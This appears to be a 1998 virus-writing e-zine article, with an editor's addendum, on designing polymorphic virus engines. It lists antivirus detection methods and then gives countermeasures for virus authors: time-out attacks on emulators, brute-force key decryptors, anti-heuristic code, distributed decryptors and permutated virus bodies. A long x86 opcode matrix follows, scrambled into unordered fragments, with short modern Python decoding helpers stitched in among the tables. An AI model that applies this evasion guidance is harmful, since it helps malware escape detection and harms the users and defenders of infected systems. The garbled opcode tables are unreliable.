So, what methods are used to detect polymorphic viruses in the wild? And what weaknesses of the polymorphic engine design do they exploit? These are questions particularly interesting to any aspiring writer of a polymorphic engine. It must be understood that anti-virus software developers often implement the lowest-grade working solutions. For instance, when Whale appeared, multiple scan strings were used instead of an algorithm. When MtE appeared, an algorithm was used instead of more sophisticated methods of analysis such as single-stepping through the decryptor or emulation of the decryptor code. So, a virus sufficiently advanced to defeat currently available methods of detection would instantly get a time window that would give it a chance to spread in the wild. Well, let's take a look at what we're up against.
Scan strings - this is something a designer of a good polymorphic engine should not worry about. You do need to keep in mind that any sort of structured code fragments in your engine, such as anti-debugging code or anti-emulation code, can be scanned for and used to aid a scanner in analysing a piece of code. A small set of fixed chunks of junk code can also be detected if the decryptor is scanned with several scan strings that allow for wildcards.
Algorithmic analysis - again, something not commonly used in our day and age. This works by analysing the code, and deducing the file is infected (or not infected) if certain conditions are met - for instance, if a decryptor structure is recognised or if the scanner finds an opcode that couldn't have possibly been generated by the engine.
Statistical analysis - this is a specialised form of algorithmic analysis that counts up the incidence of certain opcodes and code structures. This method is still used quite heavily in heuristic engines to set off an alarm if a file contains code that does not "look" naturally written or generated. Of itself, it is of little use.
Int 1h tracing - also known as single stepping. I don't know of any anti-virus scanner that uses this antiquated method of examining the code; however, Thunderbyte's TbClean program utilises the int 1h single-step mode to disinfect files. Defeating this method is simple enough, but it's usually not worth including the code, simply because it's so little-used.
Cryptanalysis - attempts to crack the virus's encryption and find a scan string underneath. While it's rarely used, it can be very effective against a fair number of polymorphic and encrypted viruses. Once again, though, defeating it isn't usually worth the effort.
Heuristic scanning - this method was originally developed to find viruses unknown to the virus scanner in question. However, the anti-virus software designers have caught on and are now using it to detect unnatural looking code which is often found in decryptors of polymorphic engines.
Emulation - this is the method currently relied on by anti-virus software to detect most polymorphic viruses. A piece of code performs the function of a fairly complete CPU and executes the code in question in a controlled environment until it deduces it has emulated far enough, at which point a scan can be performed for a fixed signature. All the work that went into a polymorphic engine goes right down the toilet bowl.
Polymorphic Virus Detection Countermeasures. A properly designed engine should aim to generate code that is as obscure and difficult to detect as possible. Here's a simple point-by-point guide to stopping most detection methods. Scan strings this is should be avoided by proper engine design. By proper engine design, I mean that any and all code produced by the decryptor should be completely variable - at least one alternative per every opcode that is used for any structure. Algorithmic analysis this should be combatted by including at least 80% of all 80x86 opcodes, and all of the commonly used opcodes. The more variability here, the more difficult it is to disqualify a file as a potential carrier of the engine, therefore it becomes difficult to identify all of the infected files without false alarms. Statistical analysis this also depends on how the engine is structured. A few engines include a lot of one-byte instructions that mess around with the flags, nop's, hlt's, lock's, or whatever. Do not do this - any statistical scanner worth its salt will pick out the file with 25 nop's and 19 clc's in a 380-byte area of code. I'll elaborate on this in the section that describes the engine structure. Int 1h tracing the countermeasures for this are well-known. Most stack modification instructions, flags tests and other such anti-debugging tricks will stop a simple tracer. Prefetch queue tricks are inadvisable to use here since it is difficult to design ones that will be compatible with all processors, past, present and future.
Cryptanalysis this technique relies on the fact that a lot of viruses will encrypt their code with simple operations like a single 8-bit xor loop. This is often true. However, doing several mathematical operations on every byte will quite easily defeat this method, as it will need to try a large number of combinations to find the right encryption algorithms and keys. The use of sliding keys once again makes the job more difficult, as the right key modification operation has to be found for every loop. Heuristic scanning this relates to statistical analysis, especially so in polymorphic engines. The key to avoiding producing heuristically sensitive decryptors is structuring the engine in a way that would ensure that the generated code appears to look like natural code written by a human being and assembled by an assembler. This means, among other things is that all of the opcodes a polymorphic engine generates must be in their shortest form. A point that must be noted here is that heuristical analysis is used to determine whether or not the code should be emulated. If your virus passes the heuristic checking, it won't be emulated to start with, or the emulator will stop before the virus is decrypted. The two are a part of one mechanism, where defeating one will stop analysis completely. Emulation defeating this method alone will significantly reduce the number of your virus samples anti-virus programs X, Y and Z will detect. To defeat this method though, one must have a good knowledge of the emulation system or systems in question. Well, here's the good news: the emulation systems used in anti-virus software are quite inferior in that they are often incomplete, sometimes buggy. This is most often intentional. Why? Well, most encrypted or polymorphic viruses use a limited instruction set in their decryptors. This means there are instructions left out of their instruction sets. 
The wider variety of instructions your polymorphic engine can generate (in context, of course), the better the chance of stopping an emulator. Emulators will also restrict the virus's function, so something as simple as writing to a memory location and testing the write can detect an emulator's presence. However, there's a more serious threat to an emulator attack. Most emulators are designed for speed. Therefore, a counterattack on an emulation system that will always be effective should be designed to bleed off as much of the time as possible. This accomplishes two goals - the user will prefer a fast, unreliable scanner over a slow and reliable one, and it would take an emulator a long time to detect the virus decryptor. Of course, an emulator could time out assuming it's emulated the code too far and quit emulating, which is a complete victory for the virus author. An example time-out attack could be orchestrated in the following fashion. The virus is encrypted and written to disk, but the key is not saved. To derive the key, some sort of checksum of the unencrypted code is saved. The virus is decrypted with a random key, the checksum is calculated, and the two checksums are compared. If the two checksums do not match, the virus is re-encrypted with the reverse operation and the process is looped back. This makes for a larger, more sophisticated loop, which an emulator must go through hundreds of times, magnifying the relative slowdown. Anti-virus emulators are built with avoiding infinite loops in mind, so perhaps an emulator will skip such a structure. [MGL's note: For example Spanska's IDEA.6126 uses above described approach ] Another time out strategy is building complex decryptors. This will be further explained in the section dedicated to engine structure, but the premise is that the more code the emulator has to execute, the slower it will be. 
Therefore, a decryptor containing a moderate number of conditional jumps, calls to subroutines, and other such structures will be slower to emulate than one that's purely linear.
Designing And Structuring A Polymorphic Engine.
A polymorphic engine is no trivial task to write. Much of the overhead can be reduced by setting down an appropriate structure for the engine and organising it according to that. The function of a polymorphic engine is to encrypt a piece of code and produce a decryptor that will then decrypt the encrypted code. The decryptor that is produced must be as variable as possible. To achieve this, and to make analysis more difficult, a polymorphic engine will usually be written to produce:

Decryptor loop
One or several loops in the actual decryptor code that would be selected from one of several loop types where the individual instructions within the loop would be modified. The algorithms used to perform the en/decryption would range from common XOR loops to esoteric int 1h tracers that would decrypt individual opcodes as they were executed.

Junk instructions
Opcodes written in before, after or in between the decryptor loop itself to disguise the presence of the polymorphic decryptor in the infected file. This has traditionally been a problem area for most polymorphic engines, as the junk produced was not within the statistical bounds of regular code. More recently, virus writers have paid more attention to this, and more complex code structure has been created by latter-day polymorphic engines.

Armouring code
This has been widely explored, and the traditional approach here was to generate code fragments ranging from stack tricks to int calls. The purpose here has been to stop analysis by anti-virus software and people analysing the decryptor, either by using an emulator or a real-mode debugger that would step through the code by utilising the 80x86 single-step mode.

Anti-heuristic code
I've seen only a couple of engines that use this particular sort of code. The purpose here is to obfuscate the decryptor by concealing the actual decryptor instructions.
Here, I would like to both compliment a virus writer for his achievement and expand on his idea to suggest a new design standard for advanced polymorphic engines. Almost 4 years ago, a virus was published in an underground virus exchange e-zine called 40Hex. The name of this virus was Level-3, and the author was then-famous Vyvojar, who had by then firmly established himself with the notable One_Half virus. [MGL's note: according to Vyvojar, the One_Half virus was written to demonstrate a virus with maximum spreading abilities, while its successor Level-3 demonstrated the use of hardcore poly encryption.] The design of the engine was revolutionary - the engine would generate the decryptor code, and then emulate it to determine the instruction flow. This concept is quite similar to the ideas I was working on at the time, which leads me into the design structure of an engine that would be extremely resistant to most analysis methods.

First of all, all of the code the engine generates would have to be emulated by its own internal emulator. This means the contents of the registers can be quite easily tracked by the emulator and the levels of complexity will be increased to a great degree. For instance, when a value like a key, the start of the encrypted area, or any such value is required, the engine can quite simply fix up the values already held in the registers. The values on the stack would be emulated too. The possibilities here are really much bigger than the simple variation that can be achieved by setting down sets of rules for generating code.

Secondly, all of the 8086 opcodes should be produced by the engine. However, they should be produced in different frequencies - for instance, an average decryptor would usually contain about 80% of the 8086 instruction set, with the remaining 20% generated in 1 out of 20 samples. The garbage generation can be handled by building tables which would be accessed with different probabilities. Of course, producing 80386+ opcodes or floating point coprocessor instructions would both increase variability and make the engine harder to emulate. Remember, no emulator is perfect, and most anti-virus emulators cannot handle complex instruction sets in decryptors.

Thirdly, the structure of the decryptor itself should be complicated by such things as calls and conditional jumps. The reason for this is quite simple - it facilitates emulator slowdown. For example, 3 calls to a 20-byte subroutine are equivalent to 69 bytes of code (three 3-byte calls plus three passes through the 20 bytes). Conditional jumps are very useful for slowing down the process too. An emulator will attempt to emulate every path that is available if it cannot predict the direction of the jump - a technique known as path emulation. One jump that cannot be predicted by an emulator means the decryptor will have to be emulated twice. Two such jumps mean the decryptor will have to be emulated four times. Structures like this ensure that a small decryptor may take as long to emulate as a very large decryptor.

Finally, a word about layers. It seems that a lot of people believe a higher number of layers will ensure adequate protection. This protection is only there in so far as the emulator will simply take as long to emulate the layers as it would for a single decryptor of the collective size of these layers. There is a restriction on the largest possible size or the largest number of layers that has to be made, and it seems optimal to maintain only two layers, one to fool heuristic scanners into thinking it's legitimate code and decrypt the second one, and the second being a simple cyclical decryptor for the rest of the virus. I hope that this has given you an insight, inspiration or ideas to implement. Good luck with designing your new super-polymorph. ;)
Special thanks to MGL, Pockets and Owl for their invaluable ideas and suggestions. Greetings fly out to all my friends in the scene. This document is © 1998 Buz [FS], and may be distributed so long as the correct copyright of this document is stated, and it is not modified in any way. Any medium in which this document is distributed in must be free.
Polymorphism is a must for viruses. Buz[FS] brings us some valuable ideas for coding it. His paper is very consistent and well written. But there are several omitted things that we should mention.
Brute-force decrypting
An interesting idea for complicating scanning. It was first shown in real life by the virus IDEA, so named because it uses the cryptographic algorithm IDEA to encrypt its body. It pushes the emulation time of such a decryptor to the limit, so the antivirus aborts its emulation on time-out. This works because even the virus itself doesn't know the decryption key and tests all combinations to find it. This takes, for example, a second on a real machine, but for the emulator in an antivirus it will take tens or even hundreds of seconds - which is of course not acceptable. But you should keep in mind that it is enough for the antivirus to detect the decryptor (or even less specific things) to flag a virus, and the antivirus has no real need to do such brute-force key finding. But if the algorithm is polymorphic enough and the antivirus can't detect any scheme in it, this will really work pretty well. You should also keep in mind to use a good cryptographic algorithm (not a simple xor), because otherwise the antivirus can perform cryptanalysis faster than your key-finding routine runs.
Opcodes variability
These days you can hear: this poly engine uses fpu instructions, another poly engine uses pentium opcodes, and yet another uses mmx opcodes. All this sounds good, but it is not compatible at all. For example, older Cyrix or AMD cpus don't have MMX at all. And there are pentiums without mmx, and 486s as well. On those your virus will hang - and that is the best way to get it detected by lame users. Yes, it is good to use many specific opcodes, because the code will be harder to identify and harder to trace. However, you should not use opcodes that are incompatible. How to solve this? Well, my suggestion is to have some extra opcodes enabled by special flags. Because PEs are basically i386 compatible, you should stay at this level for regular files. But when a virus is going to infect system files to establish itself a home on a new computer (like installing to DLLs or VXDs), you can use as many opcodes as the current machine supports, because there is no chance (or very little) that these files will leave the current computer. But for a travelling virus, you don't know what processor the target machine has, and you should stay as compatible as the original file you are infecting (check the CPU flag in the PE header). For more on this, you can read our other article about opcodes.
Entry-point hiding
Now we have to break the most common definition of polymorphism used worldwide. Everyone understands a polymorphic virus to be a virus stored in a file with a fixed body and a generated decryptor that decodes this fixed body. This prevents easy detection of the body; instead, the generated decryptor must be analysed and detected. But that is not the whole story. This is only the way everyone knows it; there are also other techniques that break this rule. Entry-point hiding was first very successfully demonstrated in a piece of code called Commander Bomber by Dark Avenger (in fact the inventor of polymorphism as we now know it). Commander Bomber leaves its body completely visible (how lucky for avers), but you don't know where it actually is. It infects only com files, so the whole file can of course be scanned to detect it (a weak point of this virus), but in general you don't know where the body is: there are several fragments of code, placed anywhere in the host file, that are connected with jumps, conditional jumps and call/rets as well. As the code is generated (just as in classic polymorphic engines), it is hard to tell whether a fragment of code belongs to Commander Bomber or not. Commander Bomber uses an excellent code generator, but imho Darkie chose not to encrypt it in order to simplify the work of avers. No matter now. This technology is hard to scan, because antiviruses do not load the whole file (imagine running this on a 1mb PE), and simply can't reach the body by following all the code fragments.
Distributed decryptor
This is a kind of combination of the entry-point hiding idea mentioned above with a decryption routine. In a normal poly engine the situation is similar to figure 1, while a distributed poly decryptor looks like figure 2.

fig. 1 (normal poly engine): infected host, decryptor, encrypted body of the virus
fig. 2 (distributed decryptor): decryptor parts and the encrypted body of the virus placed between parts of the infected host
The prelude to the distributed decryptor topic was written by the Bulgarian programmer known as Dark Avenger in his Commander Bomber virus (already mentioned). The first real (as far as I know) but weak implementation of a distributed decryptor can be seen in Vyvojar's One_Half virus, with its decryptor divided into 10 parts. However, it was really simple, and we should not call it truly polymorphic, as the encryption scheme was pretty visible even to a fool. But even though it was so simple, it complicated life for avers really well. Maybe you remember. And what would the perfect distributed decryptor be? Imagine a decryptor spread all across the host file, with no specific locations, emulated of course, with code fragments linked together by conditional and unconditional jumps, calls, and loops combining linear and cyclic structures, plus time-out attacks, armouring and anti-debug code. Easy to say, harder to code, but why not try it? A demonstration of this is for example Vyvojar's EMM3 (Explosion Mutation Machine 3).
Permutated virus code
We can't stop the path of polymorphism at the encryptor level. Another level of polymorphism is a permutated (we can call it polymorphic, if you want) virus body itself. It is the easier degree of having the whole virus look different every time. It was first demonstrated in Ender's TMC:Level_42, which we also have available in this issue (or the bugfixed version TMC:Level_6x9 - if you know The Hitchhiker's Guide to the Galaxy). TMC stands for Tiny Mutation Compiler, which is in fact not a good name - because it is a Mutation Linker instead. It is able to place its own code fragments at different locations, breaking them at instruction level, connecting these fragments with the original conditional jumps or with generated jumps, and linking all the jumps and memory references to the correct offsets. We can define code permutation as changing the memory position of the code while keeping the code-flow of the virus itself. This is quite enough to cause big problems for scanners, as they have to catch all the samples. Whatever scan string an avir chooses may fail, as the virus can be broken in the middle of that string and will not be detected. To do this, the virus has to have its own code stored in some form capable of permutation (one that carries linking information), or to have some rules for permutating already running code (and some way to keep the linking information as well).
True polymorphics
Can a virus body be really different for every instance at the instruction level? Well, nowadays there isn't any virus doing this. However, I think it is possible, because there are many ways to program the same subroutine (even one that uses the same algorithm) so that it is completely different at the binary and instruction level. Most probably it is necessary to have some pre-compiled form that will be assembled each time, instead of using the virus's own code as a template (that might be possible, but is even harder to implement). These ideas are described in more detail in Navrhar's article on this topic called ASM vs. HLL.
The guys forced me to publish a matrix which I used to create a predictive polymorphic encryption engine (based on emm3 ideas). Because MGL's matrix published in our zine #1 was really poor, I created a better one, including 386+ opcodes of course. However, the matrix presented here is also quite obsolete. I started to build a new one some weeks ago, but Katmai and Athlon specific opcodes overlap a lot, so it took me more than a week to sort that out, and after that I accidentally deleted what was already done. And you can imagine - I was so angry that I didn't start again :)
To use this matrix, you should first install the true-type fonts (supplied) which I used in these excel sheets: control panel - fonts - file - install new fonts. Then you can print it as big as you wish and start marking the opcodes and groups you need to optimize your engine :) Good luck!
Flush
Download opcode matrix here
Opcodes x86 x0
x1
x2
x3
x4
x5
0x
ADD r/m, r8
ADD r/m, r
ADD r8, r/m
ADD r, r/m
ADD AL, im8
ADD AX, im
x6
x7
x8
x9
xA
xB
xC
xD
PUSH
POP
OR r/m, r8
OR r/m, r
OR r8, r/m
OR r, r/m
OR AL, im8
OR AX, im
1x
ADC r/m, r8
ADC r/m, r
ADC r8, r/m
ADC r, r/m
ADC AL, im8
ADC AX, im
AND r/m, r8
AND r/m, r
AND r8, r/m
AND r, r/m
AND AL, im8
AND AX, im
ES:
XOR r/m, r8
XOR r/m, r
XOR r8, r/m
XOR r, r/m
XOR AL, im8
XOR AX, im
SS:
xE CS
POP
SBB r/m, r8
SBB r/m, r
SBB r8, r/m
SBB r, r/m
SBB AL, im8
SBB AX, im
DS
SUB r/m, r8
SUB r/m, r
SUB r8, r/m
SUB r, r/m
SUB AL, im8
SUB AX, im
CS:
CMP r/m, r8
CMP r/m, r
CMP r8, r/m
CMP r, r/m
CMP AL, im8
CMP AX, im
DS:
xF 1)
2x 3x 4x
INC
INC
AX
5x
INC
CX PUSH
6x
PUSHA
7x
POPA POPAD r,
JO rel8
BX BOUND m
JNO rel8
PUSH
JNC rel8
DAA
AAA
prefix
INC
INC
SI PUSH
DEC
DI POP 386+
FS:
GS:
ofs 16/32
oper 16/32
prefix
prefix
prefix
prefix
JZ rel8
JNZ rel8
JA
PUSH
JNA
rel8
rel8
JS
table 2.1
table 2.2
table 2.3
table 2.4
TEST r/m, r8
TEST r/m, r
XCHG r/m, r8
XCHG r/m, r
MOV r/m, r8
NOP XCHG xchg ax, ax AX, CX
XCHG AX, DX
XCHG AX, BX
XCHG AX, SP
XCHG AX, BP
XCHG AX, SI
XCHG AX, DI
CBW
Ax
MOV AL, [adr]
MOV AX, [adr]
MOV [adr], AL
MOV [adr], AX
CMPS
TEST AL, im8
Bx
MOV AL, im8
MOV CL, im8
MOV DL, im8
MOV BL, im8
table 2.8 r/m, im8
Dx Ex
JP
rel8
r8/m8, sim8 r/m, sim8
Cx
JNS
rel8
IMUL r, i8, m
POP
table 2.12
r/m, im
table 2.9 r/m, im8
table 2.13
RETN
MOVSB
MOV AH, im8
MOV CH, im8
M
M
RETN
im8
table 2.14
MOVS
LES r, m
! 2)
! 2)
table 2.14
AAM
r8/m8, 1
r/m, 1
r8/m8, CL
r/m, CL
im8
LOOPNZ rel8
LOOPZ rel8
LOOP rel8
JCXZ IN rel8 JECXZ AL, im8
MOV DH, im8
MOV BH, im8
table 2.10 LDS
r, m
CMPSB
MOV m, im8
AAD
SETALC
IN AX, im8
OUT im8, AL
CWD
JL
JNL
JG
OUT im8, AX
LEA
PUSHF
STOS
MOV DX, im
POPF
LODS
MOV SP, im
table 2.7 m
SAHF
LAHF
SCASB
SCAS
POPFD
LODSB
MOV BX, im
rel8
MOV seg, r/m
r, m
PUSHFD
STOSB
JNG
rel8
table 2.6
MOV r/m, seg
WAIT
186+
OUTS
MOV BP, im
MOV SI, im
MOV DI, im
186+
LEAVE
RETF
RETF
INT 3
INT
imm x87
XLAT
CALL far
MOV CX, im 186+
ENTER im, im8
MOV r, r/m
DI 186+
OUTSB
rel8
CDQ adr
TEST AX, im
MOV AX, im
286+
im8
MOV r8, r/m
CWDE
table 2.11 MOV m, im
MOV r/m, r
POP
SI 186+
INS
rel8
DEC DI
POP BP
INSB
rel8
DEC
186+
JNP
rel8
AAS
prefix
table 2.5 r8/m8, im8
9x
PUSH im8
DAS
prefix
SI
POP 186+
POP DS
DEC
SP
186+
PUSH
BP
POP BX
186+
IMUL r, i, m
DEC SP
POP DX
186+
im
DEC BX
POP CX
AX
386+
DEC DX
POP
DI
386+
DEC CX
AX
PUSH SI
386+
ARPL r, m
SS
prefix
BP
P286+
JC rel8
SS
BP
SP
186+
ES PUSH
INC
SP PUSH
DX 186+
PUSHAD
8x
PUSH
CX 186+
INC
BX
PUSH
AX
INC
DX
ES
table 1
PUSH
INTO
IRET
im8
x87
x87
x87
x87
x87
x87
x87
ESC0 m32/fr
ESC1 m32/fr
ESC2 m32/(r8?)
ESC3 m32/(r?)
ESC4 m64/fr
ESC5 m64/fr
ESC6 m16/fr
ESC7 m16/(r?)
CALL near adr
JMP near adr
JMP far adr
JMP short rel8
IN AL, DX
IN AX, DX
OUT DX, AL
OUT DX, AX
table 3.1
Fx
LOCK
…
REPNZ
REP
prefix
prefix
prefix
HLT
CMC
table 2.16 m8, (im8)
table 2.17 m, (im)
USED Symbols:
im, im8 - Immediate number, in current operand size 16/32, or 8 bit
sim, sim8 - Signed immediate number 16/32, 8 bit
r/m - Register or memory, see R/M microcode table
r, r8 - Register, see Register microcode table
m, m8 - Memory mode
[adr] - Fixed address location (imm)
rel8 - Relative address (sim8, based from next instruction)
adr - Fixed address (imm)
seg - Segment register
1) - 8088 POP CS
2) - Documented only with im8 = 0Ah, on NEC only this variant is implemented
A - AX variant is not used by compilers (shorter form is available too)
! - Undocumented instruction / not used by compilers
M - Operand is actually r/m type, but is invalid with R variant
Instruction legality / note / warning
A! 2)
Operand list with its size
im8
386+
INSTR prefix
CPU limitation Instruction mnemonic
JCXZ
Optional instruction modification, usualy with 66-prefix (not mentioned in string instructions)
Is a prefix, not a instruction
CLC
STC
CLI
STI
CLD
STD
table 2.18 m8
table 2.19 m
Register microcode table (reg)

reg        0      1      2      3      4      5      6      7
8 bit      AL     CL     DL     BL     AH     CH     DH     BH
16/32 bit  (E)AX  (E)CX  (E)DX  (E)BX  (E)SP  (E)BP  (E)SI  (E)DI
segments   ES     CS     SS     DS     FS     GS     -      -
Postbyte
XXxx xxxx  mod
xxXX Xxxx  reg OR instruction
xxxx xXXX  r/m

SIB
XXxx xxxx  scale
xxXX Xxxx  index
xxxx xXXX  base
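The two bit layouts above can be sketched as a pair of small helpers. This is only an illustration of the field split, written in Python for convenience; the function names `split_postbyte` and `split_sib` are made up for this example and do not come from the matrix.

```python
def split_postbyte(byte):
    """Split a postbyte (ModR/M) into its (mod, reg, rm) bit fields."""
    if not 0 <= byte <= 0xFF:
        raise ValueError("postbyte must fit in 8 bits")
    mod = (byte >> 6) & 0b11    # XXxx xxxx
    reg = (byte >> 3) & 0b111   # xxXX Xxxx (register number or instruction selector)
    rm = byte & 0b111           # xxxx xXXX
    return mod, reg, rm


def split_sib(byte):
    """Split a SIB byte into its (scale, index, base) bit fields."""
    if not 0 <= byte <= 0xFF:
        raise ValueError("SIB byte must fit in 8 bits")
    scale = (byte >> 6) & 0b11  # XXxx xxxx
    index = (byte >> 3) & 0b111 # xxXX Xxxx
    base = byte & 0b111         # xxxx xXXX
    return scale, index, base
```

For example, the postbyte C3h is 1100 0011 in binary, so it splits into mod 3, reg 0, r/m 3.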
16-bit addressing modes (rows: r/m, columns: mod)

r/m  mod 0     mod 1          mod 2        mod 3
0    [BX+SI]   [BX+SI+sim8]   [BX+SI+im]   AL/AX
1    [BX+DI]   [BX+DI+sim8]   [BX+DI+im]   CL/CX
2    [BP+SI]   [BP+SI+sim8]   [BP+SI+im]   DL/DX
3    [BP+DI]   [BP+DI+sim8]   [BP+DI+im]   BL/BX
4    [SI]      [SI+sim8]      [SI+im]      AH/SP
5    [DI]      [DI+sim8]      [DI+im]      CH/BP
6    [im]      [BP+sim8]      [BP+im]      DH/SI
7    [BX]      [BX+sim8]      [BX+im]      BH/DI
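As a rough sketch, the 16-bit table can be turned into a lookup like the one below. The helper name `describe_rm16` and the `wide` flag are assumptions made for this example, and the register numbering used is the standard Intel encoding (4 = SP, 5 = BP for 16-bit registers).

```python
# Base expressions for r/m = 0..7 in the 16-bit addressing modes.
BASES_16 = ["BX+SI", "BX+DI", "BP+SI", "BP+DI", "SI", "DI", "BP", "BX"]
REG8 = ["AL", "CL", "DL", "BL", "AH", "CH", "DH", "BH"]
REG16 = ["AX", "CX", "DX", "BX", "SP", "BP", "SI", "DI"]


def describe_rm16(mod, rm, wide=True):
    """Return the operand notation for a 16-bit (mod, r/m) pair."""
    if not (0 <= mod <= 3 and 0 <= rm <= 7):
        raise ValueError("mod must be 0..3 and r/m must be 0..7")
    if mod == 3:
        # Register operand: the width depends on the instruction.
        return REG16[rm] if wide else REG8[rm]
    if mod == 0:
        if rm == 6:
            return "[im]"  # special case: direct address, no base register
        return "[" + BASES_16[rm] + "]"
    disp = "sim8" if mod == 1 else "im"
    return "[" + BASES_16[rm] + "+" + disp + "]"
```

Calling `describe_rm16(1, 6)` gives `[BP+sim8]`, which shows why plain `[BP]` has no mod 0 encoding: that slot is taken by the direct address form.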
32-bit addressing modes (rows: r/m, columns: mod)

r/m  mod 0   mod 1        mod 2      mod 3
0    [EAX]   [EAX+sim8]   [EAX+im]   AL/EAX
1    [ECX]   [ECX+sim8]   [ECX+im]   CL/ECX
2    [EDX]   [EDX+sim8]   [EDX+im]   DL/EDX
3    [EBX]   [EBX+sim8]   [EBX+im]   BL/EBX
4    [SIB]   [SIB+sim8]   [SIB+im]   AH/ESP
5    [im]    [EBP+sim8]   [EBP+im]   CH/EBP
6    [ESI]   [ESI+sim8]   [ESI+im]   DH/ESI
7    [EDI]   [EDI+sim8]   [EDI+im]   BH/EDI
SIB base (rows: base, columns: MOD of postbyte)

base  mod 0   mod 1      mod 2
0     +EAX    +EAX       +EAX
1     +ECX    +ECX       +ECX
2     +EDX    +EDX       +EDX
3     +EBX    +EBX       +EBX
4     +ESP    +ESP       +ESP
5     +im     +EBP+im8   +EBP+im
6     +ESI    +ESI       +ESI
7     +EDI    +EDI       +EDI

Note: If MOD of postbyte is 11, SIB is not present at all!
SIB index

index  0      1      2      3      4   5      6      7
       [EAX]  [ECX]  [EDX]  [EBX]  -   [EBP]  [ESI]  [EDI]
SIB scale

scale  0      1          2          3
       index  index * 2  index * 4  index * 8
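Putting the SIB base, index and scale tables together, a memory operand can be described roughly as follows. This is a sketch only: `describe_sib` is a hypothetical helper, and its output notation (`im`, `sim8`) simply follows the symbols used in the tables above.

```python
REG32 = ["EAX", "ECX", "EDX", "EBX", "ESP", "EBP", "ESI", "EDI"]


def describe_sib(mod, sib):
    """Describe the memory operand selected by a SIB byte and the postbyte's mod."""
    if mod not in (0, 1, 2):
        raise ValueError("no SIB byte is present when mod is 3")
    if not 0 <= sib <= 0xFF:
        raise ValueError("SIB byte must fit in 8 bits")
    scale = 1 << (sib >> 6)     # 0..3 -> multiply index by 1, 2, 4, 8
    index = (sib >> 3) & 0b111
    base = sib & 0b111

    parts = []
    no_base = (base == 5 and mod == 0)  # base 5 with mod 0 means "+im" only
    if not no_base:
        parts.append(REG32[base])
    if index != 4:                      # index 4 means "no index register"
        term = REG32[index]
        if scale > 1:
            term += "*" + str(scale)
        parts.append(term)
    if mod == 1:
        parts.append("sim8")
    elif mod == 2 or no_base:
        parts.append("im")
    return "[" + "+".join(parts) + "]"
```

With mod 0, the SIB byte 98h (scale 2, index 3, base 0) describes `[EAX+EBX*4]`, and 24h with mod 1 describes `[ESP+sim8]`, the only way to address through ESP.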
Extended "0F" Opcodes x0
x1 286+
0x
table 2.20
table 2.21 r/m
LAR r, m/m
LSL r, r/m
table 3.4
table 3.5
table 3.6
…
…
MOV r32, CRn
…
MOV r32, DRn
MOV CRn, r32
3x
WRMSR
CMOVO r, m
5x
-
6x
RDMSR
SET1 r8/m8, CL 386+
SET1 r/m, CL
8x
JO
-
CMOVNC r, m
-
CMOVZ r, m
CMOVNZ r, m
FS CMPXCHG r/m, r8
r/m
Cx
XADD r/m, r8
486+ B1+ step M
486+
NEC V33/V53
Ex
BRKXA im8 NEC V33/V53
Fx
RETXA im8
MMX
PSRAW mm, mm/m64 MMX
PSLLW mm, mm/m64
xE
xF
-
-
-
-
NEC V20+
NEC V20+
NEC V20+
NEC V20+
CLEAR1 r/m, im
SET1 r/m, im8
SET1 r/m, im
NOT1 r/m, im8
NOT1 r/m, im
ROR4
-
-
-
-
-
m8
386+
LSS
386+ M
BTR r/m, r
r, m
386+ M
r, m
r, m -
-
-
MMX
PSRLD mm, mm/m64
MMX
PSRLQ mm, mm/m64
PMULLW mm, mm/m64
-
PMULHW mm, mm/m64
-
PMADDWD mm, mm/m64
MMX
-
MMX
PSLLD mm, mm/m64
MMX
PSLLQ mm, mm/m64
USED Symbols:
im, im8 - Immediate number, in current operand size 16/32, or 8 bit
sim, sim8 - Signed immediate number 16/32, 8 bit
r/m - Register or memory, see R/M microcode table
mm - MMX register
r, r8 - Register, see Register microcode table
m, m8 - Memory mode
[adr] - Fixed address location (imm)
rel8 - Relative address (sim8, based from next instruction)
rel - Relative address (sim16/32, based from next instruction)
adr - Fixed address (imm)
seg - Segment register
! - Undocumented instruction / not used by compilers
M - Operand is actually r/m type, but is invalid with R variant
table 2.29 m, im8
486+
AX PSUBUSB mm, mm/m64
-
-
PSUBSB mm, mm/m64
-
-
PSUBB mm, mm/m64
MMX
MMX
DX
PAND mm, mm/m64
-
POR mm, mm/m64
MMX
PSUBSW mm, mm/m64 MMX
PSUBW mm, mm/m64
MMX
MMX
PSUBD mm, mm/m64
MMX
PADDSB mm, mm/m64 PADDB mm, mm/m64
IMUL r, r/m 386+
MOVSX r, r8/m8 486+
386+
MOVSX r, r16/m16
486+
486+
BSWAP
SP MMX
PADDUSB mm, mm/m64
MMX
-
386+
BSWAP
BP MMX
-
r/m -
386+
BSWAP
BX
MMX
PSUBUSW mm, mm/m64
r/m
BSR r/m, r 486+
BSWAP
386+
SETNG
386+
386+
BSF r/m, r 486+
BSWAP
CX MMX
-
386+
rel 386+
SETG
r/m 386+
386+
JNG
rel 386+
SHRD SHRD r/m, r, im8 r/m, r, CL
BTC r/m, r
486+
BSWAP
-
MMX
486+
BSWAP
386+
SETNL
r/m
MMX
MOVQ mm/m64, mm
JG
rel 386+
386+
386+
table 2.30
MMX
PSRAD mm, mm/m64
-
GS -
386+
SETL
BTS r/m, r
MMX
MOVQ mm, mm/m64
MOVD r/m32, mm
JNL
rel
r/m
386+
MOVZX r, r16/m16
m80
386+
486+
RSM
-
486 table 3.12 MMX
table 2.28
386+
SETNP
r/m
P6+
CMOVNG r, m
MOVD mm, r/m32
486
table 2.27 JL
rel
POP
CMOVG r, m -
-
m80
386+
386+
-
386+
SETP
r/m
CMOVNL r, m
MMX
JNP
rel
386+
PUSH GS
m80
386+
P6+
-
486
386+
SETNS
r/m
MMX
-
CMOVL r, m -
table 2.26
JP
rel 386+
P5+
-
m80
386+
P6+
MMX
486
table 2.25
P6+
-
486
SETS
CMPXCHG r/m, r
386+
MOVZX r, r8/m8
CMOVNP r, m
MMX
JNS
rel 386+
r/m
386+
LGS
P6+
-
RSDC sreg, m80
386+
386+ table 3.13 486 B0- table 3.14 486 B0-
LFS
CMOVP r, m
MMX
486
SETNA
CMPXCHG r/m, r8
P6+
-
JS
rel 386+
r/m
CMOVNS r, m
SVDC m80, sreg 386+
SETA
SHLD SHLD r/m, r, im8 r/m, r, CL
P6+
MMX
JNA
rel
386+
CMOVS r, m
MMX
EMSS
386+
386+
-
-
MMX
m64
PSRLW mm, mm/m64
NEC V20+
PACKUSWB PUNPCKHBW PUNPCKHWD PUNPCKHDQ PACKSSDW mm, mm/m64 mm, mm/m64 mm, mm/m64 mm, mm/m64 mm, mm/m64
PCMPEQD mm, mm/m64
SETNZ r/m
386+
BT r/m, r
MMX
Dx
-
MMX
486+
XADD r/m, r
UD2
